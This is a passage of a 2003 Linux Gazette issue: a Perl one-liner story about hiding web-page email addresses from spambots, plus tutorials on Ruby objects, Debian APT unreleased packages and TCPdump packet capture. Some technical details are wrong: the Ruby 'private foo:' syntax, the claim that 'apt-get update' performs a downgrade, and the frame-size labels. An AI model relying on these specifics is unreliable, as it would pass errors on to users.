The old-fashioned coal-fired samovar [6] was gently perking; the zavarka (tea concentrate), made with excellent Georgian tea, gave off a marvelous smell. A plate of canapés, ranging from the best Russian butter and wild blackberry jam on freshly-baked fluffy white bread to beluga caviar on a heavy, dark rye rubbed with just a touch of garlic, was set close at hand, and both Woomert and Frink were merrily foraging in the gourmet field thus presented. Eventually they settled back, replete with good food, and Frink's curiosity could be contained no longer.

 - "Woomert, when I try to puzzle out your one-liners, I can only get so far; then I run out of steam. Can you tell me about what you did?"

Lying back in his favorite armchair, Woomert smiled.

 - "Instead, why don't you start by telling me what part you understood? I like to see how far you've advanced, Frink; it's been a pleasure to me to see you picking up some of the finer points. I'll take it from there."

 - "All right, then... Let's start with the first one:

perl -MRFC::RFC822::Address=valid -wne'/[\w-]+@[\w.-]+/||next;print valid$&' *html

I recognized all the command-line switches:

-Mmodule Use the specified module
-w Enable warnings
-n Non-printing loop
-e Execute the following commands

However, I couldn't quite puzzle out the '-MRFC::RFC822::Address=valid'syntax - what was that?"

 - "Ah. As 'perldoc perlvar' tells us, in the entry for '-M', it's a bit of syntactic sugar; '-MBar=foo' is a shortcut for 'use Bar qw/foo/', which imports the specified function 'foo' from module 'Bar'. Go on, you're doing well."

Frink cleared his throat.

 - "In that case, I think I have it figured out... almost. Let me take a quick look at 'perldoc perlvar' and 'perldoc RFC::RFC822::Address'... Yes, that's what I thought - I've got it! The regex at the beginning -

/[\w-]+@[\w.-]+/

tries to match e-mail addresses - it's not perfect, but should do reasonably well. What it says is "match any character in [a-zA-Z0-9-] repeated one or more times, followed by '@', followed by any character in [a-zA-Z0-9.-] repeated one or more times". If the match does not succeed - the '||' logical-or operator handles that - go to the next line."

 - "Brilliant, Frink! What happens then?"

 - "If it does succeed, 'next' is skipped over, and 'print valid$&' is invoked. The module documentation tells me that the 'valid' function tests an e-mail address for RFC822 (e-mail specification) conformance, and returns true or false based on validity. '$&', according to 'perldoc perlvar', is the last successful pattern match - in other words, whatever was matched by the regex. Since you saw all '1's and no errors - any matches that weren't RFC822-valid would have returned something like "Use of uninitialized value in print at -e line 1" - what you matched was all valid. What you were doing here is checking to see that your regex only matched actual addresses. How did I do?"

 - "Excellent, my dear Frink; you're coming along well! As a side note, it's generally best to avoid the use of  $&, $`, and $' as well as 'use English' in scripts; there's a rather large performance penalty associated with them (see 'perldoc perlvar'). However, here we had a very small list of matches, and so I went ahead with it. Go on, see what you can make of the next one."

 - "Um... the next one, right. Well, I've got part of it -

perl -i -wpe's=[\w-]+@[\w.-]+=join"",map{sprintf"&#%s;",ord}split//,$&=e' *html

-i In-place edit (modify the specified file[s])
-w Enable warnings
-p Printing loop
-e Execute the following commands

Mmmm... I got sorta lost here, Woomert. I see that regex that you'd used before, but what's that 's=' bit?"

 - "It's one of those convenient tweaks that Perl provides - although, admittedly, the basic idea was stolen from 'sed'. It's simply an alternate delimiter used with the 's' (substitute) operator; there are times when using the default delimiter ("/") is highly inconvenient and leads to "toothpick Hell" - as, for example, in matching a directory name:

s/\/path\/to\/my\/directory/my home directory/

Far better to use an alternate delimiter, one that is not contained in the text of either the pattern or the replacement:

s#/path/to/my/directory#my home directory#

As long as it's non-alphanumeric and non-whitespace, it'll work fine. There are some special cases, but they're all sensible ones; using a single quote disables interpolation in both the pattern and the replacement (see the rules in 'perldoc perlop'), and using braces or brackets as delimiters requires rather obvious syntax:

s{a}{b}
s(a)(b)
s[a][b]

Many people like '#' as a delimiter; I prefer '=', since '#' tends to come up in HTML and comments. Can you make sense of any of the rest?"

- "I'm afraid not. You're matching the email addresses as previously, and replacing them with something, but I can't figure out what."

- "All right; it is rather involved. The replacement part of the substitution is actual Perl code; we can do that thanks to the 'e' (evaluate) modifier on the end of the 's' operator. Let's parse the relevant code from right to left:

join"",map{sprintf"&#%s;",ord}split//,$&

We know that '$&' contains an email address; the next thing we do is use the 'split' function which converts a scalar to a list, splitting it on whatever is specified between the delimiters. In this case, however, the delimiter is empty, a null - so the returned list has each character of the address as a separate element in the list. We now pass this list to the 'map' function, which will evaluate the code specified in the {block} for each element of the supplied list and return the result - as another list.

Within the block itself, each character is used as an argument to the 'ord' function, which returns the ASCII value of that character; this, in turn, is used as the argument for the 'sprintf' function which returns the following formatted string:

&#<ASCII_value>;

for each value so specified. After all the characters in the list have been processed, we use the 'join' function to convert the list back to a scalar - which the substitute operator will now use as a replacement string for the original email address. What used to be "foo@bar.com" now looks like

&#102;&#111;&#111;&#64;&#98;&#97;&#114;&#46;&#99;&#111;&#109;

This, you must admit, looks nothing like an e-mail address - so spambots will not be able to read it!"

Frink looked troubled.

 - "Woomert, I hate to tell you... but human beings won't be able to read it either!"

Woomert took another sip of his tea and smiled.

 - "You're forgetting one thing, Frink. Humans aren't going to be reading this; since it's part of the HTML files, it's going to be read by browsers. As it happens, the HTML specification for showing ASCII characters by their value is

&#<ASCII_value>;

which is exactly what we've produced. Try this yourself: save the text between the following lines as "text.html" and view it in a browser.

<html><head><title></title></head><body>
&#87;&#111;&#111;&#109;&#101;&#114;&#116;&#32;&#70;&#111;&#111;&#110;&#108;&#121;
</body></html>

Do you see what I mean?"

A few moments later, Frink looked up from the keyboard.

 - "Woomert, what a great solution! Your client will be able to display the addresses without them being harvested, and the Web page will still look the same as it did before. I can tell by comparison that the last bit of code:

perl -we'map{printf"&#%s;",ord}split//,pop' user@host.com

simply enables the sysadmin to convert any new addresses before popping them into the HTML. Wonderful!"

 - "A large part of the complete solution, of course, was the CGI that the local admin had written - that takes a bit more than a one-liner, although not very much more, given the power of the CGI module. Remember, Frink: as your powers grow, make certain to align yourself with the side of Good rather than Evil. Not only is it the right thing to do; the people around you are far more likely to have brains!"
 
 

---

[1] Oddly enough, my mysterious correspondent did not include the solution to this, perhaps deeming it simple enough (!) for the public to figure out - or (and I suspect this to be the more likely scenario) he has not yet figured it out himself. Readers are welcome to write in with their ideas... but for now, the workings of Woomert's game remain a puzzle.

[2] A number of commonly-used Mail Transfer Agents will ignore anything that follows a plus sign in the username part of the address, e.g. <smith+yahoo@joe.com> will be routed exactly the same as <smith@joe.com>. This can be a very useful mechanism for tracing and reducing spam: a "plus-hacked" address that becomes too spam-loaded can be directed to "/dev/null" and replaced by a newly generated one (say, <smith+yahoo1@joe.com> - which would also go to <smith@joe.com>.)

[3] A.K.A. "Apache On Steroids". From the mod_perl documentation:

The Apache/Perl integration project brings together the full power of
the Perl programming language and the Apache HTTP server. This is
achieved by linking the Perl runtime library into the server and
providing an object oriented Perl interface to the server's C language
API.

These pieces are seamlessly glued together by the `mod_perl' server
plugin, making it is possible to write Apache modules entirely in
Perl. In addition, the persistent interpreter embedded in the server
avoids the overhead of starting an external interpreter program and
the additional Perl start-up (compile) time.

There are many major benefits to using mod_perl; if you use Apache in any serious fashion without it, you're almost certainly throwing away some of your time and effort.

[4] If you've seen "The Matrix", just picture the Sentinels. If you haven't seen it, hey, you've got only yourself to blame. :)

[5] Gibberish is the written form of the Marketroid language. It was formerly spoken by the Gibbers, who all died out as a result of their complete inability to do anything (as opposed to talking about it.) It is exactly as comprehensible as its spoken counterpart, although many people confuse the two: "it's all marketroid gibberish!" is a highly redundant statement.

[6] See the "Russian Tea HOWTO", by Dániel Nagy, for the proper way to make and serve Russian tea. The man knows what he's talking about.

 

Ben is a Contributing Editor for Linux Gazette and a member of The Answer Gang.

Ben was born in Moscow, Russia in 1962. He became interested in electricity at age six--promptly demonstrating it by sticking a fork into a socket and starting a fire--and has been falling down technological mineshafts ever since. He has been working with computers since the Elder Days, when they had to be built by soldering parts onto printed circuit boards and programs had to fit into 4k of memory. He would gladly pay good money to any psychologist who can cure him of the resulting nightmares.

Ben's subsequent experiences include creating software in nearly a dozen languages, network and database maintenance during the approach of a hurricane, and writing articles for publications ranging from sailing magazines to technological journals. Having recently completed a seven-year Atlantic/Caribbean cruise under sail, he is currently docked in Baltimore, MD, where he works as a technical instructor for Sun Microsystems.

Ben has been working with Linux since 1997, and credits it with his complete loss of interest in waging nuclear warfare on parts of the Pacific Northwest.

---

Copyright © 2003, Ben Okopnik. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

Qubism By Jon "Sir Flakey" Harsem

These cartoons are scaled down to minimize horizontal scrolling. To see a panel in all its clarity, click on it.

All Qubism cartoons are here at the CORE web site.

 

Jon is the creator of the Qubism cartoon strip and current Editor-in-Chief of the CORE News Site. Somewhere along the early stages of his life he picked up a pencil and started drawing on the wallpaper. Now his cartoons appear 5 days a week on-line, go figure. He confesses to owning a Mac but swears it is for "personal use".

---

Copyright © 2003, Jon "Sir Flakey" Harsem. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

Programming in Ruby - Part 3 By Hiran Ramankutty

Review

In part 1 we looked at the basic syntactic structure of Ruby. In part 2 we discussed iterators and the fundamentals of Object-Oriented Programming. Here in part 3 we explore object-orientedness in more detail.

Methods

A method is an action the object knows how to perform on request. Let's see an example of how a method is invoked for an object:

print "asdfgh".length
^D
6

One can infer from this that a method named `length' of the String object is called.

Now try this:

foo = "abc"
print foo.length,"\n"
foo = [1, 2]
print foo.length,"\n"
^D
3
2

From the result it is clear that deciding which method to call is done at execution time, and that the choice differs depending on the content of the variable.

I suggest that readers not bother about how the object determines its length because the process is different for strings and arrays. Fortunately, Ruby automatically chooses the correct process, so we don't have to worry about it. This feature in languages supporting object orientedness is called polymorphism.

It is not necessary for the user to know how the methods are processed, but one has to know what methods are acceptable to the object. When an object receives an unknown method, an error is raised. For example: try calling the "length" method for the object "foo" with value "5".

I had mentioned about a special variable self in Ruby. It is the object which calls methods. Such callings are used very often and so an abbreviation is available. That is;

self.method_name(arguments...)

can be omitted then

method_name(arguments...)

causes same effect. Called function is just an abbreviation for method calling to self.

Classes

The real world consists of objects which can be classified. For example, a one-year-old child may think `bowwow' on seeing a dog or even a fox. In terms of object orientedness, `bowwow' can be termed class, and an object belonging to a class is called instance.

In Ruby, as in other object oriented languages, we first define a class to determine the behaviour of the object, and then make an instance of the class, a specific object. So let's define a class in Ruby.

class Dog
	def bark
		print "Bow wow\n"
	end
end
^D

The definition of the class lies between the keywords `class' and `end'. A `def' in class syntax defines a method of the class.

Now that we have a class named `Dog', let's make an object.

tommy = Dog.new
tommy.bark
^D
Bow wow

This makes a new instance of the class Dog and substitutes it into the variable tommy. The method `new' of any class makes a new instance. Now the variable tommy has properties defined in the class Dog, and so he can `bark'.

Inheritence

Ever wondered how others classify objects? One example is how people perceive a dog. A mathematician may see a dog as an object made up of different numbers and figures, a physicist may see it as the result of many natural and artificial forces at work, and my sister (a zoologist) may interpret it as a representative of the species canine domesticus. To her, a dog is a kind of canine, a canine is a kind of mammal, and a mammal is always an animal.

Hence we see that the classification of objects takes the form of a hierarchy, though not in all cases. Let's see what Ruby does with it.

class Animal
	def breath
		print "inhales and breaths out\n"
	end
end
class Cat<Animal
	def bark
		print "mew\n"
	end
end
tama = Cat.new
tama.breath
tama.bark
^D
inhales and breaths out
mew

Here the Cat class isn't given any definitions on how to breathe, but it will inherit that property from the Animal class. In this case, the `bark' feature is just appended.

It is notable that the properties of the parent class or the super class is not always inherited. For example, birds fly, but penguins don't. Penguins do have other properties of birds, though, like laying eggs. This kind of thing can be represented in Ruby also, and I leave it to the reader as home work.

To make a new class using inheritence from a superclass that holds common properties, we only need define the differences from the superclass. Some say this `differential programming' is one of the merits of object oriented programming.

Redefining Methods

We can observe difference in behaviour of the instances in subclasses when we redefine the superclass methods. See below:

class Human
	def print_id
		print "I'm a human.\n"
	end
	def train_toll(age)
		print "reduced-fare.\n" if age < 12
	end
end
Human.new.print_id
class Student1<Human
	def print_id
		print "I'm a student.\n"
	end
end
Student1.new.print_id
class Student2<Human
	def print_id
		super
		print "I'm a student too.\n"
	end
end
Student2.new.print_id
^D
I'm a human.
I'm a student.
I'm a human.
I'm a student too.

In the new classes that redefine the superclass methods, the original method of superclass can be called using `super'. Along with the code above, try this:

class Student3<Human
	def train_toll(age)
		super(11) # unconditionally reduced
	end
end
Student3.new.train_toll(25)
^D
reduced-fare.

These are simple examples, but I hope they give you and idea of how inheritance and redefinition works.

More on Methods

There are some methods which play the role of restricting the way a method is called. For a function (defined at top level) given below:

def sqr(x)
	x * x
end
print sqr(5)
^D
25

When `def' appears outside of class definition, it has effect of adding this method to the Object class. The Object class is the base class of all other classes- all classes inherit from the class Object. The means that the method `sqr' can be used in all other classes.

Now that all classes must be able to call `sqr', let's try to call `sqr' to `self':

print self.sqr(5)
^D
ERR: private method `sqr' called for (Object)

Calling the function using `self' after the definition of the function gives the error as shown above. The error message is not intuitive, so what does it mean?

What is happening is that a method that is defined at the top levelcan can be called using function style as opposed to method style. See what error message you get when undefined methods are called.

Since methods are called in a function type style, it works in a fashion similar to that of C++, while calls are within the class or its subclass.

We can restrict access to methods using `public' or `private' - public methods can be called by users of the class, while private methods can only be called by other methods inside this class.

class Test
	def foo
		print "foo\n"
	end
	private foo:
	def bar
		print "bar -< "
	foo
	end
end
temp = Test.new
temp.foo
temp.bar
^D
ERR: private method `foo' called for (Test)
bar -< foo

The concept must be clear with the kind of output obtained.

Singleton Method

The behaviour of an instance is determined by the class, but we know that a particular instance should have special behavior. In most languages, we must make another class for the instance, while in Ruby we can append methods to a paticular instance without much fuss.

class SingletonTest
        def size
                print "25\n"
        end
end
t1=SingletonTest.new
t2=SingletonTest.new
def t2.size
        print "10\n"
end
t1.size
t2.size
^D
25
10

Here t1 and t2 belong to the same class, though, t2 redefines the `size' method so it will behave differently. A method of a particular instance is called singleton method.

One example where singleton methods are used is in the buttons of a GUI program, where each button has a different action. We can redefine the action suitably for each button object.

Modules

Modules in Ruby are very similar to classes, but are used to group related classes together. There are three major differences between modules and classes:

1. Modules have no instance.
2. Modules have no subclass.
3. Modules are defined by module ... end.

Roughly saying, there are two uses of modules. First, to collect methods or constants. For example:

print Math::PI,"\n"
print Math.sqrt(2),"\n"
^D
3.141592654
1.414213562

The operator `::' refers to a constants in a module or class. When we refer directly to the methods or the constants of a method, we use the `include' method.

include Math
print sqrt(2),"\n"
print PI,"\n"
^D
1.414213562
3.141592654

Another use of modules is called `mixin'. This can be complex so should be explained in detail.

In some Object-Oriented programming languages, a class can inherit from more than one superclass; this feature is called multiple-inheritance. Ruby purposely doesn't have this feature. Instead, we can make it by mixin with the module.

As said above, the module works like the class; the methods or the constants of a module cannot be inherited, but instead are appended to other modules or classes by use of include. So, when one includes the definition of a module, this adds the property (mixes the property) into the class.

mixin modules appear in the standard library, and by mixing in these modules to a class whose the `each' method returns each element, the class get the features: `sort', `find', etc.

The following differences exist between multiple-inheritance and mixin:

• The module don't generate instances; it is a guarantee for the abstract class.
• The module keeps the relationship of instance to be a tree.

These differences inhibit complex relationships between classes; simplicity is a good thing. This is why Ruby doesn't have multiple inheritance. In languages that have multiple inheritance, situations can occur where classes have many superclasses and the relationship of instances form a tangled network... Situations like this are too complex to understand for the brain of the human being, or at least my brain...

On the other hand, mixins make it simple as just `the collection of particular properties all we want to add'.

So, even in a language with multiple inheritance, it is recognized that it is good to extend classes by using mixin rather than developing complicated inheritance relationships. We advanced this idea in Ruby allowing mixins only instead of multiple inheritance.

Procedure Objects

Suppose you are writing a program that does something to process signals. Those familiar with it will understand the simplicity in sending a procedure as an argument to a method (here usually arrival of signals).

The built-in method proc generates a procedure object. The procedure code goes between braces, and to execute the procedure object one uses the call method. See below:

obj = proc{print "Hello world\n"}
obj.call
^D
Hello world

C programmers will find procedure objects similar to function pointers.

Conclusion

With this, we come to an end of the series of articles Part 1, Part 2 and Part 3 with which I have intended to give readers a basic introduction to programming in Ruby. I have not tried to present hard core programming in Ruby: this is my final year of Engineering, and I am busy with my final year project and have been unable to look deeply into Ruby. But I know that as time permits, I will come up with much more in Ruby.

Happy Programming...

 

I am a final year student of Computer Science at Government Engineering College, Trichur, Kerala, India. Apart from Linux I enjoy learning Physics.

---

Copyright © 2003, Hiran Ramankutty. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

Debian APT Part 2: Installing Unreleased Software By Rob Tougher

Contents

Introduction

Overview

Installing Unreleased Packages

Initial Setup

Installing An Unreleased Package

Upgrading Unreleased Packages

Downgrading From Unreleased To Released

Conclusion

References

Introduction

APT stands for the Advanced Packaging Tool - it is a package management system for Debian GNU/Linux. In Part 1 of this series, I described how to use APT to install Debian software on your machine. If you are unfamiliar with APT, you should read that first.

Part 1 focused on installing only released versions of Debian's software packages. Besides the released versions, Debian provides unreleased packages for people who need the latest versions of software. This article describes how to install these unreleased packages.

Overview

In the last article I introduced two concepts: the package, and the package cache. Now I am introducing a third: the distribution. A distribution is a collection of packages, installation scripts, user documentation, and configuration applications unique to Debian.

There are three Debian distributions:

• stable - the released version.
• testing - the candidate for the next release.
• unstable - the development version.

The stable distribution is the released version of Debian. The packages in stable have been tested thoroughly. Most of the packages installed on my machine come from the stable distribution.

The testing distribution is the candidate for the next release. Packages in this distribution have undergone some testing, but require more testing before they can be released. When testing is ready, it becomes the stable distribution, and the old stable distribution is moved to archives.

The unstable distribution is the development distribution. Debian volunteers update it continuously. The packages in unstable may not have been tested at all, and may not work. After a package has undergone some testing, it gets moved to the testing distribution.

A software package can exist in one or more of these distributions. For example, the php4 package is contained in all three. In stable its version is 4.1.2, in testing its version is 4.1.2, and in unstable its version is 4.2.3. I currently have version 4.1.2 installed on my machine - if I needed version 4.2.3, I could install it from the unstable distribution.

Installing Unreleased Packages

Initial Setup

To get your machine ready to install software packages from testing or unstable, you have to perform the following steps:

• Add an entry to /etc/apt/sources.list to include the distribution
• Modify /etc/apt/apt.conf to make the stable distribution the default
• Call apt-get update

sources.list keeps a list of sources for Debian software. In the last article we had 7 CDROM sources and 2 HTTP sources. Now let's add two more HTTP sources - one for the testing distribution and one for the unstable distribution. My sources.list file now looks like the following:

# Two new sources
deb http://http.us.debian.org/debian unstable main contrib non-free
deb http://http.us.debian.org/debian testing main contrib non-free

# Sources from last article
deb http://security.debian.org/ stable/updates main
deb http://http.us.debian.org/debian stable main contrib non-free
deb cdrom:[Debian GNU/Linux 3.0 r0 _Woody_ - Official i386 Binary-6 (20020718)]/ unstable contrib main non-US/contrib non-US/main
deb cdrom:[Debian GNU/Linux 3.0 r0 _Woody_ - Official i386 Binary-7 (20020718)]/ unstable contrib main non-US/contrib non-US/main
deb cdrom:[Debian GNU/Linux 3.0 r0 _Woody_ - Official i386 Binary-5 (20020718)]/ unstable contrib main non-US/contrib non-US/main
deb cdrom:[Debian GNU/Linux 3.0 r0 _Woody_ - Official i386 Binary-4 (20020718)]/ unstable contrib main non-US/contrib non-US/main
deb cdrom:[Debian GNU/Linux 3.0 r0 _Woody_ - Official i386 Binary-3 (20020718)]/ unstable contrib main non-US/contrib non-US/main
deb cdrom:[Debian GNU/Linux 3.0 r0 _Woody_ - Official i386 Binary-2 (20020718)]/ unstable contrib main non-US/contrib non-US/main
deb cdrom:[Debian GNU/Linux 3.0 r0 _Woody_ - Official i386 Binary-1 (20020718)]/ unstable contrib main non-US/contrib non-US/main

Next you modify apt.conf so that you still use packages from stable by default. My apt.conf file looks like the following:

# Make 'stable' the default distribution
APT::Default-Release "stable";

To finish the initial setup call apt-get update. This will download the latest package information, and update your local package cache.

Installing An Unreleased Package

Let's continue our example from last section. The stable distribution contains version 4.1.2 of the php4 package. Let's say you wanted version 4.2.3 - maybe it contained some new feature you needed. You could install this package using the following command:

prompt$ apt-get -t unstable install php4

This would install version 4.2.3 of the php4 package. Note the -t switch on the command line - this is telling APT that it is allowed to use packages from the unstable distribution. If you didn't include the -t switch, APT would be unable to install version 4.2.3 of the package, because the stable distribution is your default.

Upgrading Unreleased Packages

You can upgrade your testing and unstable packages by using the apt-show-versions command:

prompt$ apt-get install `apt-show-versions -u -b | grep testing`

Downgrading From Unreleased to Released

You can downgrade packages on your machine. This means that if you have a testing or unstable package installed, and you don't want it any more, you can downgrade the package to the latest stable version.

Before being able to downgrade, you must make an entry in your /etc/apt/preferences file. The entry looks like the following:

Package: php4
Pin: release a=stable
Priority: 1001

Once you make this entry you can run the following command to downgrade a package:

prompt$ apt-get update

Conclusion

APT is a powerful package management system. It allows you to install, maintain, and remove software applications from your Debian system. In this article I focused on installing software from Debian's unreleased distributions, testing and unstable.

References

• Debian documentation
• man pages for apt-get, apt-cache, sources.list, apt.conf, and apt_preferences

 

Rob is a software developer in the New York City area.

---

Copyright © 2003, Rob Tougher. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

Exploring TCP/IP with TCPdump and Tethereal By Vinayak Hegde

The shortest introduction to TCP/IP

TCP/IP has become the de facto standard protocol for communication between computers. IP (Internet Protocol) provides functionality at the network layer (addressing and routing) while TCP (Transmission Control Protocol) provides (virtual) end-to-end connectivity. The TCP/IP family includes a host of other useful protocols such as ICMP (Internet Control Message Protocol), IGMP (Internet Group management protocol) and UDP (User Datagram Protocol). An overwhelming majority of today's networks use TCP/IP. Almost every other application today incorporates some kind of a network functionality hence it has become necessary for every programmer to have at least a working knowledge of TCP/IP.

Communication between computers using TCP/IP takes place through the exchange of packets. A packet is a PDU (Protocol Data Unit) at the IP layer. The PDU at the TCP layer is called a segment while a PDU at the data-link layer (such as Ethernet) is called a frame. However the term packet is generically used to describe the data unit that is exchanged between TCP/IP layers as well as between two computers.

This is how an Ethernet frame looks:

+------------------------------------------------------------------+ | | | | | | | Ethernet| IP | TCP | Encapsulated | Ethernet | | Header | Header | Header | Data | Trailer | | | | | | (FCS) | +------------------------------------------------------------------+ <- 20 bytes -> <- 40 bytes -> <---------- max length = 1500 bytes ----------> FCS stands for Frame Check Sequence.

TCPdump and Tethereal

TCPdump is a utility that allows a user to intercept and capture packets passing through a network interface. This is an extremely nifty little utility which can help a programmer to troubleshoot network applications. Because this utility captures all the packets received by a network interface, it can be used for used for unlawful purposes as well.

Normally only the packets which are addressed to a network interface are intercepted and passed onto the upper layers of the TCP/IP protocol layer stack. Other packets which are not addressed to the interface are ignored. In Promiscuous mode, the packets which are not intended to be received by the interface are also intercepted and passed onto the higher levels of the protocol stack. TCPdump works by putting the network interface into promiscuous mode.

TCPdump uses the libpcap (packet capture library) which is freely available. The libpcap library is versatile and works with BSD packet filter, the SVR4 Data-link Provider Interface (DLPI) and the Linux SOCK_PACKET interface. Tethereal which is the command line version of the popular network traffic analyser tool ethereal also uses pcap packet capture library. Tethereal is a powerful tool for analysing network traffic and also provides more facilities for decoding packets as compared to TCPdump. Ethereal the GUI tool for analysing packets is extremely good and one can see the different flags and options which have been used in a hierarchical way. The best feature of ethereal is it can piece together the different fragments of the the communication between two computers and show the whole ASCII text that was exchanged during the conversation.

The TCP and IP packet format

ASCII representation from RFC 791

0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Version| IHL |Type of Service| Total Length | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Identification |Flags| Fragment Offset | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Time to Live | Protocol | Header Checksum | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Destination Address | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ IP Header Format

ASCII representation from RFC 793

0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | data | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ TCP Header Format

Examples of Packet capture using TCPdump and Tethereal

You can experiment with TCPdump on any interface through which we can conduct network transactions. To list the different interfaces connected to your computer, you can give the command

#ifconfig -a

This will list out all the network interfaces connected to your system including the loopback interface. If you are connected to the net using a dialup line, you can also use the interface ppp0 for experimenting and debugging your applications using TCPdump.

Example #1
This is a snippet (from the file tcpdumpppp) of the captured packet using a dialup line (PPP). The -vvv flag tells tcpdump to be very very verbose. The other switches for controlling verbosity are -v and -vv.

#tcpdump -vvv > tcpdumpppp tcpdump: listening on ppp0

The capturing of packets is stopped by pressing CTRL-C.

15:57:58.181078 207.219.33.101.http > 203.94.236.47.33003: P 1:1399(1398) ack 736 win 31856 (DF) [tos 0x10] (ttl 38, id 28827, len 1450)

Some of the information can be interpreted from the about packet dump

• The protocol used is http (port 80 has been decoded as http).
• The local IP address assigned to me by my ISP after dialing up is 203.94.236.47 (this can be verified by grepping in /var/log/messages
• The http server's IP is 207.219.33.101 (IP have been changed for security reasons).
• The time-to-live is 38 hops.
• The Don't Fragment (bit) has been set informing the intermediate routers not to fragment the datagram.
• The ACK flag has been set (ack number 736 - piggybacking).
• The window size is 31856.
• The port on the receiver end is 33003

Example #2
This packet dump was captured from a NIC (interface denoted by eth0)

#tcpdump -a -i eth0

06:21:11.414863 > pca03.nt.co.in.ssh > pcc03.mum.nt.co.in.4944: P 252143283:252143331(48) ack 2638534821 win 62780 (DF) [tos 0x10] E^P ^@ X .... @^@ @^F .. N .... .... .... .... ^@^V ^S P ^O^G f.. .. D .... P^X .. < .. t ^@^@ k + Y^Q .... .. ( ^.. )^G c 3 ^\ v t.. ..^G ^J.. .. t 9.. .. - F.. .... 6.. /.. .... 9.. [.. .... G.. .. d

Here we are telling TCPdump to resolve IPs to domain names if possible (-a) and explicitly asking it to capture packets on interface eth0. If we don't give the (-i) option TCPdump itself searches for the interfaces and then starts capturing packets arriving on them. Some of the information that can be gleamed from the above packet dump is:-

• The ssh port (22) has been used on the server side. This can be seen from the /etc/services file.
• One of the bits of Type of Service (TOS) has been set so the QoS enabled networks can give the requested TOS to the packet.
• The window has been advertised as 62780.
• The length of the packet is 48 bytes.

Example #3

The following snippet shows a packet dump of SYN (connection requesting) packet. The packet dump was taken on Ethernet.

15:57:56.074928 203.94.236.47.33003 > 216.239.33.101.http: S [tcp sum ok] 937694521:937694521(0) win 5840 (DF) (ttl 64, id 54537, len 60)

The following information can be interpreted from the above dump:-

• The Header checksum is correct ([tcp sum ok])
• This is a SYN packet (denoted by S).
• The amount of data encapsulated by tcp segment is 0.
• The window scaling option has been set to null.
• The MSS (Maximum Segment size is 1460). On Ethernet MSS = 1500 - 40 = 1460.
• The Length of the packet is 60 bytes (20 + 40) (see diagram above)

Example #4
The following packet dump was taken using tethereal

#tethereal -i lo

26 19.624878 localhost.localdomain -> localhost.localdomain TCP 33283 > http [FIN, ACK] Seq=877643253 Ack=882239950 Win=37296 Len=0

As can be seen be seen from the above output the output of tethereal is not much different from TCPdump. The above is a FIN,ACK Packet (to close the connection). Tethereal when used with it's front-end ethereal can be very useful to detect network anomalies as well.

Final Words

While TCPdump is an extremely good tool, it focuses mainly on TCP/IP protocol. It does it's job well. Ethereal is much more versatile and can understand a variety of protocols. Also, the user interface of ethereal is well designed so that even a newbie can understand which packets are getting captured and what information do they contain. The good interface makes the learning process even more enjoyable.

Resources

• Protocol RFCs
• W. Richard Stevens TCP/IP Illustrated Vol I
• TCPdump home
• Ethereal Homepage

 

My life changed since I discovered Linux. Suddenly Computers became interesting as i could try out lots of stuff on my Linux box due to the easy availably of source code. My interests are predominantly in the fields of networking, embedded systems and programming languages. I currently work for Aparna Web services where we make Linux accessible for academia/corporations by configuring remote boot stations (Thin Clients).

---

Copyright © 2003, Vinayak Hegde. Copying license http://www.linuxgazette.com/copying.html
Published in Issue 86 of Linux Gazette, January 2003

---

...making Linux just a little more fun!

Is vmWare good for Linux users? By Alan Ward

The pros and cons of vmWare for the Linux enthusiast.

